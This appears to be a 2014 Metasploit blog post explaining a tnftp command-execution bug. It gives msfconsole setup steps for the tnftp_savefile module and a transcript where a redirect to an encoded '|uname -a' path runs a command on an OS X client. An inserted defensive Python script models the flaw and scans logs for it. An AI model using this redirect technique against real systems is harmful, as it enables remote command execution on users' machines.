This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements and events in the Metasploit Framework over the course of 2014.

It's been quite a year for shell bugs. Of course, we all know about Shellshock, the tragic bash bug that made the major media news. Most of us heard about the vulnerabilities in the command line tools wget, curl, and git (more on that last one later on during HaXmas). But did you notice the FTP command bug, the one that remains unpatched today on a fairly popular operating system? Read on...

popen()'ing an RCE present

Shortly before Halloween, I was reading the oss-sec mailing list when I stumbled upon a pretty cool (almost tragic) bug in the ftp(1) command on {Free,Net,DragonFly}BSD and OS X.

The bug is rather simple, as explained (somewhat verbosely) by the description in the Metasploit module:

This module exploits an arbitrary command execution vulnerability in tnftp's handling of the resolved output filename - called "savefile" in the source - from a requested resource.

If tnftp is executed without the -o command-line option, it will resolve the output filename from the last component of the requested resource.

If the output filename begins with a "|" character, tnftp will pass the fetched resource's output to the command directly following the "|" character through the use of the popen() function.

Okay, so how do we use this thing?

We can use Metasploit! Using auxiliary/server/tnftp_savefile is pretty easy:

msf > use auxiliary/server/tnftp_savefile
msf auxiliary(tnftp_savefile) > set uripath /
uripath => /
msf auxiliary(tnftp_savefile) > set urihost [redacted]
urihost => [redacted]
msf auxiliary(tnftp_savefile) > set uriport 80
uriport => 80
msf auxiliary(tnftp_savefile) > run
[*] Auxiliary module execution completed
msf auxiliary(tnftp_savefile) >
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://10.6.0.59:8080/
[*] Server started.

Don't worry about the URIHOST or URIPORT advanced options unless you're working through a tunnel. Just set URIPATH to / to allow any URL to redirect to the exploit.

Triggering the vulnerability

Here we are triggering the vuln on a fully patched OS X Yosemite system:

wvu@hiigara:~$ ftp http://[redacted]/index.html
Requesting http://[redacted]/index.html
Redirected to http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61
Requesting http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61
     0        0.00 KiB/s Darwin hiigara 14.0.0 Darwin Kernel Version 14.0.0: Fri Sep 19 00:26:44 PDT 2014; root:xnu-2782.1.97~2/RELEASE_X86_64 x86_64
     0        0.00 KiB/s
wvu@hiigara:~$

Thanks to the redirect, we can hide the true purpose of our URL until it's too late.
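The module description above gives the whole savefile rule (no -o, take the last path component, and a leading "|" goes to popen()), and the transcript shows why a redirect matters: the client prints the percent-encoded target, so the pipe is not obvious until tnftp decodes it. The following script is an added example, not code from the original post or from tnftp or Metasploit. It models that savefile derivation in Python (the exact order of decoding in tnftp's source is an assumption here), adds a hardened variant that refuses pipe names, and runs the check over a few constructed proxy-style log lines, including the encoded path from the transcript, so a defender can see which requests and redirect targets would have reached popen() on an unpatched client.

```python
from urllib.parse import urlsplit, unquote

# Constructed proxy/web-server log sample (not from the original post).
# Format: client method requested_url status redirect_location_or_dash
SAMPLE_LOG = """\
10.6.0.59 GET http://example.test/index.html 302 http://example.test:80/%7c%75%6e%61%6d%65%20%2d%61
10.6.0.59 GET http://example.test:80/%7c%75%6e%61%6d%65%20%2d%61 200 -
10.6.0.42 GET http://example.test/downloads/report.pdf 200 -
10.6.0.42 GET http://example.test/old/file.tar.gz 301 http://example.test/new/file.tar.gz
"""


def derive_savefile(url, outfile=None):
    """Model of how tnftp picks its output name, per the module description:
    an explicit -o name wins; otherwise the last path component of the
    requested resource, percent-decoded. Assumed to match tnftp's behaviour;
    this is a model written for the example, not tnftp's own code."""
    if outfile is not None:
        return outfile
    path = urlsplit(url).path
    last_component = path.rsplit("/", 1)[-1]
    return unquote(last_component)


def is_pipe_savefile(name):
    """True when an unpatched tnftp would hand this name to popen()."""
    return name.startswith("|")


def safe_savefile(url, outfile=None):
    """Hardened variant: same derivation, but a pipe-prefixed name is rejected
    instead of being executed. Returns the plain filename or raises."""
    name = derive_savefile(url, outfile)
    if is_pipe_savefile(name):
        raise ValueError("refusing to use output name starting with '|': %r" % name)
    return name


def scan_log(text):
    """Return (client, url, decoded_savefile) for every requested URL or
    redirect target whose derived savefile begins with '|'. Both columns are
    checked because, as in the transcript, the harmless-looking first URL is
    the one the user typed and the redirect target carries the pipe."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed lines rather than guessing
        client, _method, url, _status, location = fields
        for candidate in (url, location):
            if candidate == "-":
                continue
            name = derive_savefile(candidate)
            if is_pipe_savefile(name):
                hits.append((client, candidate, name))
    return hits


if __name__ == "__main__":
    for client, url, name in scan_log(SAMPLE_LOG):
        print("%s fetched %s -> savefile %r" % (client, url, name))
    try:
        safe_savefile("http://example.test:80/%7c%75%6e%61%6d%65%20%2d%61")
    except ValueError as err:
        print("hardened client:", err)
```

The check decodes before looking at the first character, which is the step the transcript hides: `%7c%75%6e%61%6d%65%20%2d%61` only becomes `|uname -a` after tnftp's own decoding, so a filter that inspects the raw URL text would miss it.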

Back in msfconsole, we can see the results of our attack:

[*] 10.6.0.59        tnftp_savefile - tnftp/20070806 connected
[*] 10.6.0.59        tnftp_savefile - Redirecting to exploit...
[+] 10.6.0.59        tnftp_savefile - Executing `uname -a'!

That's really all there is to it! Happy hacking!